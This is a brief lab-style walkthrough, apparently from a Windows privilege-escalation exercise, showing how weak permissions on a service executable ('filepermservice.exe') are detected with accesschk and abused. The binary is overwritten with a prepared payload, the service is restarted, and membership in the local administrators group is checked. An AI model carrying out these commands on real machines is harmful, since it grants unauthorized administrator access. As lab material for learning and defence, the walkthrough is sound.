# Escalation Path Executables files

This attack exploits **insecure file permissions** on a Windows service executable (`filepermservice.exe`). If **"Everyone"** has **write access**, a low-privileged user can replace the executable with a malicious file to gain **administrator privileges**.
## Detection

**Windows VM**

Open command prompt and type: 

```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
```  

Notice that the *Everyone* user group has `FILE_ALL_ACCESS` permission on the `filepermservice.exe` file.

## Exploitation

**Windows VM**

Open command prompt and type: 

```
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"  
```

In command prompt type: 

```
sc start filepermsvc  
```

It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: 

```
net localgroup administrators
```